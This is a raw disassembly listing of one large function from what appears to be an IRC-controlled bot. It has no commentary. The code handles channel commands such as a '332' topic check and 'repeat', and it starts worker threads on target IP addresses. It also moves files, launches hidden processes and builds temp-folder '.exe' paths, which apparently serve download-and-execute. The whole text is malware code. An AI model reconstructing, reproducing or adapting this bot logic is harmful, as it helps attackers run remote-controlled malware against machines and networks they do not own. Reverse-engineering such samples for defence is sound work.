cmp byte ptr dword_4442E8[eax], 73h
jnz loc_404979
push esi
push [ebp+4Ch+var_8] ; Str
call j__atol
imul eax, 234h
pop ecx
add eax, offset byte_444500
push eax
push edi
push offset aSSS_1 ; "[%s] <%s> %s"
loc_4083C8: ; CODE XREF: sub_40274D+5B9E�j
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call _sprintf
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
loc_4083EA: ; CODE XREF: sub_40274D+23E3�j
add esp, 28h
jmp loc_404979
; ---------------------------------------------------------------------------
loc_4083F2: ; CODE XREF: sub_40274D+4C56�j
; sub_40274D+4C6D�j
push [ebp+4Ch+var_8]
call dword_44417C ; inet_addr
push edi ; Str
mov [ebp+4Ch+var_688], eax
call j__atol
push [ebp+4Ch+arg_0] ; Str
mov [ebp+4Ch+var_698], eax
call j__atol
mov esi, [ebp+4Ch+arg_4]
push 7Fh ; Count
push [ebp+4Ch+Format] ; Source
mov [ebp+4Ch+var_690], eax
lea eax, [ebp+4Ch+var_718]
push eax ; Dest
mov [ebp+4Ch+var_71C], esi
call _strncpy
mov eax, [ebp+4Ch+var_C]
mov edi, [ebp+4Ch+var_4]
add esp, 14h
push [ebp+4Ch+var_690]
mov [ebp+4Ch+var_680], edi
push [ebp+4Ch+var_698]
mov [ebp+4Ch+var_67C], eax
push [ebp+4Ch+var_688]
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42D820 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 0Bh ; int
push eax ; Source
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_68C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_71C]
push eax
push offset sub_40C3D3
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_68C]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4084D4
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D918
jmp loc_40491A
; ---------------------------------------------------------------------------
loc_4084CC: ; CODE XREF: sub_40274D+5D8D�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4084D4: ; CODE XREF: sub_40274D+5D6C�j
cmp [ebp+4Ch+var_678], ebx
jz short loc_4084CC
jmp loc_404929
; ---------------------------------------------------------------------------
loc_4084E1: ; CODE XREF: sub_40274D+4C28�j
; sub_40274D+4C3F�j
push [ebp+4Ch+var_8] ; Str
call j__atol
push 7Fh ; Count
mov [ebp+4Ch+var_1134], eax
lea eax, [ebp+4Ch+var_1238]
push edi ; Source
push eax ; Dest
call _strncpy
push [ebp+4Ch+arg_0] ; Str
call j__atol
push [ebp+4Ch+Format] ; Format
mov esi, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_1138], eax
lea eax, [ebp+4Ch+var_11B8]
push 80h ; Count
push eax ; Dest
mov [ebp+4Ch+var_1240], esi
call __snprintf
mov eax, [ebp+4Ch+var_C]
mov edi, [ebp+4Ch+var_4]
add esp, 20h
push [ebp+4Ch+var_1138]
mov [ebp+4Ch+var_1124], eax
lea eax, [ebp+4Ch+var_1238]
push eax
push [ebp+4Ch+var_1134]
mov [ebp+4Ch+var_1128], edi
push esi
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42D7E4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 18h ; int
push eax ; Source
call sub_40AE85
add esp, 24h
mov [ebp+4Ch+var_1130], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_1240]
push eax
push offset sub_41366C
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1130]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4085CA
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D7A0
jmp loc_40491A
; ---------------------------------------------------------------------------
loc_4085C2: ; CODE XREF: sub_40274D+5E83�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4085CA: ; CODE XREF: sub_40274D+5E62�j
cmp [ebp+4Ch+var_1120], ebx
jz short loc_4085C2
jmp loc_404929
; ---------------------------------------------------------------------------
loc_4085D7: ; CODE XREF: sub_40274D+4BFA�j
; sub_40274D+4C11�j
push 0FFh ; Count
push [ebp+4Ch+var_8] ; Source
lea eax, [ebp+4Ch+var_2880]
push eax ; Dest
call _strncpy
push 0FFh ; Count
lea eax, [ebp+4Ch+var_2780]
push edi ; Source
push eax ; Dest
call _strncpy
push [ebp+4Ch+arg_0] ; Str
mov [ebp+4Ch+var_267C], ebx
call j__atol
mov [ebp+4Ch+var_2678], eax
mov eax, [ebp+esi+4Ch+var_94]
add esp, 1Ch
cmp eax, ebx
jz short loc_408630
push 10h ; Radix
push ebx ; EndPtr
push eax ; Str
call _strtoul
add esp, 0Ch
mov [ebp+4Ch+var_2670], eax
jmp short loc_408636
; ---------------------------------------------------------------------------
loc_408630: ; CODE XREF: sub_40274D+5ECD�j
mov [ebp+4Ch+var_2670], ebx
loc_408636: ; CODE XREF: sub_40274D+5EE1�j
mov esi, [ebp+esi+4Ch+var_90]
cmp esi, ebx
jz short loc_40864D
push esi ; Str
call j__atol
pop ecx
mov [ebp+4Ch+var_2674], eax
jmp short loc_408653
; ---------------------------------------------------------------------------
loc_40864D: ; CODE XREF: sub_40274D+5EEF�j
mov [ebp+4Ch+var_2674], ebx
loc_408653: ; CODE XREF: sub_40274D+5EFE�j
movzx eax, [ebp+4Ch+var_903]
mov esi, [ebp+4Ch+arg_4]
push 7Fh ; Count
push [ebp+4Ch+Format] ; Source
mov [ebp+4Ch+var_266C], eax
lea eax, [ebp+4Ch+var_2900]
push eax ; Dest
mov [ebp+4Ch+var_2904], esi
call _strncpy
mov eax, [ebp+4Ch+var_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_2664], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_2668], eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42D774 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+4Ch+Dst]
push 1Dh ; int
push eax ; Source
call sub_40AE85
add esp, 28h
mov [ebp+4Ch+var_2680], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_2904]
push eax
push offset sub_418F38
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_2680]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_408701
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D734
jmp loc_4089B1
; ---------------------------------------------------------------------------
loc_4086F9: ; CODE XREF: sub_40274D+5FBA�j
push 32h
call ds:dword_42B014 ; Sleep
loc_408701: ; CODE XREF: sub_40274D+5F99�j
cmp [ebp+4Ch+var_2660], ebx
jz short loc_4086F9
jmp loc_4089C0
; ---------------------------------------------------------------------------
loc_40870E: ; CODE XREF: sub_40274D+4BCC�j
; sub_40274D+4BE3�j
push 7Fh
pop esi
push esi ; Count
push [ebp+4Ch+var_8] ; Source
lea eax, [ebp+4Ch+var_36AC]
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+4Ch+var_362C]
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
push [ebp+4Ch+arg_0] ; Source
lea eax, [ebp+4Ch+var_35AC]
push eax ; Dest
call _strncpy
push esi ; Count
push [ebp+4Ch+Format] ; Source
lea eax, [ebp+4Ch+var_352C]
push eax ; Dest
call _strncpy
push [ebp+4Ch+arg_0]
mov eax, [ebp+4Ch+var_4]
mov esi, [ebp+4Ch+arg_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_34A8], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_34A4], eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42D6F8 ; "-"
push eax ; Dest
mov [ebp+4Ch+var_36B0], esi
call _sprintf
add esp, 44h
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 12h ; int
push eax ; Source
call sub_40AE85
add esp, 0Ch
mov [ebp+4Ch+var_34AC], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_36B0]
push eax
push offset sub_417BC8
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_34AC]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4087E5
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D6C0
jmp loc_4089B1
; ---------------------------------------------------------------------------
loc_4087DD: ; CODE XREF: sub_40274D+609E�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4087E5: ; CODE XREF: sub_40274D+607D�j
cmp [ebp+4Ch+var_34A0], ebx
jz short loc_4087DD
jmp loc_4089C0
; ---------------------------------------------------------------------------
loc_4087F2: ; CODE XREF: sub_40274D+4AA3�j
; sub_40274D+4ABA�j
push 7Fh
pop esi
push esi ; Count
push [ebp+4Ch+var_8] ; Source
lea eax, [ebp+4Ch+var_3284]
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+4Ch+var_3204]
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
push [ebp+4Ch+arg_0] ; Source
lea eax, [ebp+4Ch+var_3184]
push eax ; Dest
call _strncpy
push esi ; Count
push [ebp+4Ch+Format] ; Source
lea eax, [ebp+4Ch+var_3104]
push eax ; Dest
call _strncpy
push [ebp+4Ch+arg_0]
mov eax, [ebp+4Ch+var_4]
mov esi, [ebp+4Ch+arg_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_3080], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_307C], eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42D690 ; "-"
push eax ; Dest
mov [ebp+4Ch+var_3288], esi
call _sprintf
add esp, 44h
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 0Eh ; int
push eax ; Source
call sub_40AE85
add esp, 0Ch
mov [ebp+4Ch+var_3084], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_3288]
push eax
push offset sub_4167D6
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_3084]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4088C9
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D658
jmp loc_4089B1
; ---------------------------------------------------------------------------
loc_4088C1: ; CODE XREF: sub_40274D+6182�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4088C9: ; CODE XREF: sub_40274D+6161�j
cmp [ebp+4Ch+var_3078], ebx
jz short loc_4088C1
jmp loc_4089C0
; ---------------------------------------------------------------------------
loc_4088D6: ; CODE XREF: sub_40274D+497E�j
; sub_40274D+4995�j ...
push 7Fh
pop esi
push esi ; Count
push [ebp+4Ch+var_8] ; Source
lea eax, [ebp+4Ch+var_3F88]
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+4Ch+var_3F08]
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
push [ebp+4Ch+arg_0] ; Source
lea eax, [ebp+4Ch+var_3E88]
push eax ; Dest
call _strncpy
push esi ; Count
push [ebp+4Ch+Format] ; Source
lea eax, [ebp+4Ch+var_3E08]
push eax ; Dest
call _strncpy
push 20h ; Count
push [ebp+4Ch+var_10] ; Source
lea eax, [ebp+4Ch+var_3D88]
push eax ; Dest
call _strncpy
push [ebp+4Ch+arg_0]
mov eax, [ebp+4Ch+var_4]
mov esi, [ebp+4Ch+arg_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_3D08], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_3D04], eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42D628 ; "-"
push eax ; Dest
mov [ebp+4Ch+var_3F90], esi
call _sprintf
add esp, 50h
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 0Dh ; int
push eax ; Source
call sub_40AE85
add esp, 0Ch
mov [ebp+4Ch+var_3F8C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_3F90]
push eax
push offset sub_415BD8
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_3F8C]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4089E5
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset asc_42D5F0 ; "-"
loc_4089B1: ; CODE XREF: sub_40274D+4BA1�j
; sub_40274D+54C7�j ...
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_4089C0: ; CODE XREF: sub_40274D+4BB6�j
; sub_40274D+54DC�j ...
cmp [ebp+4Ch+var_C], ebx
jnz loc_408D10
push ebx
push [ebp+4Ch+var_4]
loc_4089CD: ; CODE XREF: sub_40274D+21E7�j
lea eax, [ebp+4Ch+Dst]
push eax
push [ebp+4Ch+Format]
push esi
jmp loc_4069A7
; ---------------------------------------------------------------------------
loc_4089DD: ; CODE XREF: sub_40274D+629E�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4089E5: ; CODE XREF: sub_40274D+6256�j
cmp [ebp+4Ch+var_3D00], ebx
jz short loc_4089DD
jmp short loc_4089C0
; ---------------------------------------------------------------------------
loc_4089EF: ; CODE XREF: sub_40274D+4950�j
; sub_40274D+4967�j
push 7Fh ; Count
push [ebp+4Ch+var_8] ; Source
lea eax, [ebp+4Ch+var_1780]
push eax ; Dest
call _strncpy
push edi ; Str
call j__atol
push 3Fh ; Count
push [ebp+4Ch+arg_0] ; Source
mov [ebp+4Ch+var_1630], eax
lea eax, [ebp+4Ch+var_1700]
push eax ; Dest
call _strncpy
mov esi, [ebp+esi+4Ch+var_94]
add esp, 1Ch
cmp esi, ebx
jz short loc_408A3A
push 3Fh ; Count
lea eax, [ebp+4Ch+var_16C0]
push esi ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_408A3A: ; CODE XREF: sub_40274D+62D9�j
lea eax, [ebp+4Ch+var_1700]
push eax
push [ebp+4Ch+var_1630]
lea eax, [ebp+4Ch+var_1780]
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42D5C0 ; "-"
push eax ; Dest
mov [ebp+4Ch+var_162C], 1
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 1Fh ; int
push eax ; Source
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_1628], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_1784]
push eax
push offset sub_4025EF
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1628]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_408AC9
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42D584
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_408AC1: ; CODE XREF: sub_40274D+6382�j
push 32h
call ds:dword_42B014 ; Sleep
loc_408AC9: ; CODE XREF: sub_40274D+6361�j
cmp [ebp+4Ch+var_1624], ebx
jz short loc_408AC1
jmp loc_406C4D
; ---------------------------------------------------------------------------
loc_408AD6: ; CODE XREF: sub_40274D+4913�j
; sub_40274D:loc_407077�j
push edi ; Str
call j__atol
cmp eax, ebx
pop ecx
mov [ebp+4Ch+var_1D6C], eax
jle loc_408BC3
push [ebp+4Ch+var_8] ; Format
mov esi, 80h
lea eax, [ebp+4Ch+var_1EF4]
push esi ; Count
push eax ; Dest
call __snprintf
push [ebp+4Ch+Format] ; Format
xor eax, eax
cmp [ebp+4Ch+var_8F6], bl
push esi ; Count
setnz al
mov [ebp+4Ch+var_1D68], eax
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_1EF8], eax
lea eax, [ebp+4Ch+var_1DF4]
push eax ; Dest
call __snprintf
mov eax, [ebp+4Ch+var_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_1D64], eax
mov eax, [ebp+4Ch+var_C]
push offset asc_42D558 ; "-"
mov [ebp+4Ch+var_1D60], eax
lea eax, [ebp+4Ch+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 15h ; int
push eax ; Source
call sub_40AE85
add esp, 38h
mov [ebp+4Ch+var_1D74], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_1EF8]
push eax
push offset sub_415C89
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1D74]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_408BB6
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D520
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_408BAE: ; CODE XREF: sub_40274D+646F�j
push 32h
call ds:dword_42B014 ; Sleep
loc_408BB6: ; CODE XREF: sub_40274D+644E�j
cmp [ebp+4Ch+var_1D5C], ebx
jz short loc_408BAE
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_408BC3: ; CODE XREF: sub_40274D+6398�j
push offset unk_42D4E8
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_408BCD: ; CODE XREF: sub_40274D+48E5�j
; sub_40274D+48FC�j
push edi
push [ebp+4Ch+var_8]
call ds:dword_42B034 ; MoveFileA
test eax, eax
jz short loc_408BFD
push edi
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+Dst]
push offset asc_42D4C4 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
loc_408BF5: ; CODE XREF: sub_40274D+2407�j
add esp, 14h
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_408BFD: ; CODE XREF: sub_40274D+648C�j
push offset dword_42D4B8
call sub_41ACD0
push eax ; Format
lea eax, [ebp+4Ch+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_408C21: ; CODE XREF: sub_40274D+48B7�j
; sub_40274D+48CE�j
push [ebp+4Ch+var_8] ; Format
lea eax, [ebp+4Ch+var_3C78]
push 104h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
cmp [ebp+4Ch+var_18], ebx
jz short loc_408C5B
push edi ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
cmp eax, ebx
pop ecx
pop ecx
jz short loc_408C5B
push eax ; Format
lea eax, [ebp+4Ch+var_3B74]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_408C5B: ; CODE XREF: sub_40274D+64EE�j
; sub_40274D+64FD�j
push [ebp+4Ch+Format] ; Format
lea eax, [ebp+4Ch+var_3CF8]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_3CFC], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_3A6C], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_3A68], eax
lea eax, [ebp+4Ch+var_3B74]
push eax
lea eax, [ebp+4Ch+var_3C78]
push eax
push offset asc_42D488 ; "-"
lea eax, [ebp+4Ch+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 24h ; int
push eax ; Source
call sub_40AE85
add esp, 2Ch
mov [ebp+4Ch+var_3A70], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_3CFC]
push eax
push offset sub_4198EB
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_3A70]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_408D20
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset asc_42D44C ; "-"
loc_408D01: ; CODE XREF: sub_40274D+731�j
; sub_40274D+963�j ...
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_408D10: ; CODE XREF: sub_40274D+84A�j
; sub_40274D+86E�j ...
xor esi, esi
inc esi
jmp loc_406C6E
; ---------------------------------------------------------------------------
loc_408D18: ; CODE XREF: sub_40274D+65D9�j
push 32h
call ds:dword_42B014 ; Sleep
loc_408D20: ; CODE XREF: sub_40274D+65A6�j
cmp [ebp+4Ch+var_3A64], ebx
jz short loc_408D18
jmp short loc_408D10
; ---------------------------------------------------------------------------
loc_408D2A: ; CODE XREF: sub_40274D+4889�j
; sub_40274D+48A0�j
push 44h
pop esi
push esi ; Size
lea eax, [ebp+4Ch+var_670]
push ebx ; Val
push eax ; Dst
call _memset
push [ebp+4Ch+var_8] ; Str
mov [ebp+4Ch+var_670], esi
xor esi, esi
inc esi
mov [ebp+4Ch+var_644], esi
mov [ebp+4Ch+var_640], bx
call j__atol
add esp, 10h
cmp eax, esi
jnz short loc_408D69
mov [ebp+4Ch+var_640], 5
loc_408D69: ; CODE XREF: sub_40274D+6611�j
cmp [ebp+4Ch+var_18], ebx
jz loc_406C4D
push edi ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
jz loc_406C4D
lea eax, [ebp+4Ch+var_D98]
push eax
lea eax, [ebp+4Ch+var_670]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call ds:dword_42B008 ; CreateProcessA
test eax, eax
lea eax, [ebp+4Ch+Dst]
jnz short loc_408DB8
push offset unk_42D428
jmp loc_406C45
; ---------------------------------------------------------------------------
loc_408DB8: ; CODE XREF: sub_40274D+665F�j
push edi
push offset dword_42D40C
jmp loc_4076DA
; ---------------------------------------------------------------------------
loc_408DC3: ; CODE XREF: sub_40274D+485B�j
; sub_40274D+4872�j
push edi ; Str2
push offset aFicken ; "ficken"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_408F2F
lea eax, [ebp+4Ch+var_48F8]
push eax
push 104h
call ds:dword_42B030 ; GetTempPathA
push 0FFh ; Count
push [ebp+4Ch+var_8] ; Source
lea eax, [ebp+4Ch+var_25D8]
push eax ; Dest
call _strncpy
lea eax, [ebp+4Ch+var_17A0]
push eax
call sub_40A8CA
push eax
lea eax, [ebp+4Ch+var_48F8]
push eax
lea eax, [ebp+4Ch+var_24D8]
push offset aSS_exe ; "%s%s.exe"
push eax ; Dest
call _sprintf
mov eax, [ebp+esi+4Ch+var_98]
add esp, 20h
cmp eax, ebx
mov [ebp+4Ch+var_23D4], 1
mov [ebp+4Ch+var_23D0], ebx
jz short loc_408E52
push 10h ; Radix
push ebx ; EndPtr
push eax ; Str
call _strtoul
add esp, 0Ch
mov [ebp+4Ch+var_23C8], eax
jmp short loc_408E58
; ---------------------------------------------------------------------------
loc_408E52: ; CODE XREF: sub_40274D+66EF�j
mov [ebp+4Ch+var_23C8], ebx
loc_408E58: ; CODE XREF: sub_40274D+6703�j
mov esi, [ebp+esi+4Ch+var_94]
cmp esi, ebx
jz short loc_408E6F
push esi ; Str
call j__atol
pop ecx
mov [ebp+4Ch+var_23CC], eax
jmp short loc_408E75
; ---------------------------------------------------------------------------
loc_408E6F: ; CODE XREF: sub_40274D+6711�j
mov [ebp+4Ch+var_23CC], ebx
loc_408E75: ; CODE XREF: sub_40274D+6720�j
movzx eax, [ebp+4Ch+var_903]
mov esi, [ebp+4Ch+arg_4]
push 7Fh ; Count
push [ebp+4Ch+Format] ; Source
mov [ebp+4Ch+var_23C4], eax
lea eax, [ebp+4Ch+var_2658]
push eax ; Dest
mov [ebp+4Ch+var_265C], esi
call _strncpy
mov eax, [ebp+4Ch+var_4]
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_23BC], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_23C0], eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42D3D4 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+4Ch+Dst]
push 1Eh ; int
push eax ; Source
call sub_40AE85
add esp, 24h
mov [ebp+4Ch+var_23D8], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_265C]
push eax
push offset sub_418F38
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_23D8]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_408F22
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42D398
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_408F1A: ; CODE XREF: sub_40274D+67DB�j
push 32h
call ds:dword_42B014 ; Sleep
loc_408F22: ; CODE XREF: sub_40274D+67BA�j
cmp [ebp+4Ch+var_23B8], ebx
jz short loc_408F1A
jmp loc_406C4D
; ---------------------------------------------------------------------------
loc_408F2F: ; CODE XREF: sub_40274D+6685�j
push offset dword_42D350
jmp loc_406C3F
; ---------------------------------------------------------------------------
loc_408F39: ; CODE XREF: sub_40274D+482D�j
; sub_40274D+4844�j
push dword ptr [ebp+4Ch+Args] ; Str2
push offset a332 ; "332"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_402B92
cmp [ebp+4Ch+var_18], ebx
jz loc_402B92
push edi ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
push eax
push [ebp+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push dword ptr [ebp+4Ch+Args]
push [ebp+4Ch+Str2]
push offset aSSSS ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
push 1FFh ; Count
lea eax, [ebp+4Ch+Dst]
push eax ; Source
push [ebp+4Ch+arg_0] ; Dest
call _strncpy
push [ebp+4Ch+var_8] ; Str
call j__atol
add esp, 30h
test eax, eax
jle short loc_408FB6
push [ebp+4Ch+var_8] ; Str
call j__atol
imul eax, 3E8h
pop ecx
push eax
call ds:dword_42B014 ; Sleep
loc_408FB6: ; CODE XREF: sub_40274D+6851�j
push offset dword_42D328
call sub_417D70
mov eax, [ebp+4Ch+arg_24]
pop ecx
inc eax
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_408FCA: ; CODE XREF: sub_40274D+47FF�j
; sub_40274D+4816�j
push dword ptr [ebp+4Ch+Args] ; Str2
push offset a332 ; "332"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_402B92
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push edi ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
push offset aRepeat ; "repeat"
inc edi
push edi ; Str1
mov esi, eax
call _strcmp
add esp, 10h
test eax, eax
push esi
lea eax, [ebp+4Ch+Dst]
jz short loc_409079
push [ebp+4Ch+Format]
push dword ptr [ebp+4Ch+Args]
push [ebp+4Ch+Str2]
push offset aSSSS ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
push 1FFh ; Count
lea eax, [ebp+4Ch+Dst]
push eax ; Source
push [ebp+4Ch+arg_0] ; Dest
call _strncpy
push esi
lea eax, [ebp+4Ch+Dst]
push offset asc_42D310 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax
call sub_417D70
push [ebp+4Ch+var_8] ; Str
call j__atol
add esp, 38h
test eax, eax
jle loc_404979
push [ebp+4Ch+var_8] ; Str
call j__atol
add eax, [ebp+4Ch+arg_24]
pop ecx
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_409079: ; CODE XREF: sub_40274D+68C0�j
push offset unk_42D2DC
jmp loc_409887
; ---------------------------------------------------------------------------
loc_409083: ; CODE XREF: sub_40274D+47D1�j
; sub_40274D+47E8�j
push 7Fh ; Count
push [ebp+4Ch+var_8] ; Source
lea eax, [ebp+4Ch+var_2088]
push eax ; Dest
call _strncpy
push 7Fh ; Count
lea eax, [ebp+4Ch+var_2008]
push edi ; Source
push eax ; Dest
call _strncpy
push 7Fh ; Count
push [ebp+4Ch+Format] ; Source
lea eax, [ebp+4Ch+var_1F88]
push eax ; Dest
call _strncpy
mov eax, [ebp+4Ch+var_4]
mov esi, [ebp+4Ch+arg_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_1F04], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_1F00], eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42D2A8 ; "-"
push eax ; Dest
mov [ebp+4Ch+var_208C], esi
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 0Fh ; int
push eax ; Source
call sub_40AE85
add esp, 40h
mov [ebp+4Ch+var_1F08], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_208C]
push eax
push offset sub_4171BC
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1F08]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_409144
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D26C
jmp loc_409205
; ---------------------------------------------------------------------------
loc_40913C: ; CODE XREF: sub_40274D+69FD�j
push 32h
call ds:dword_42B014 ; Sleep
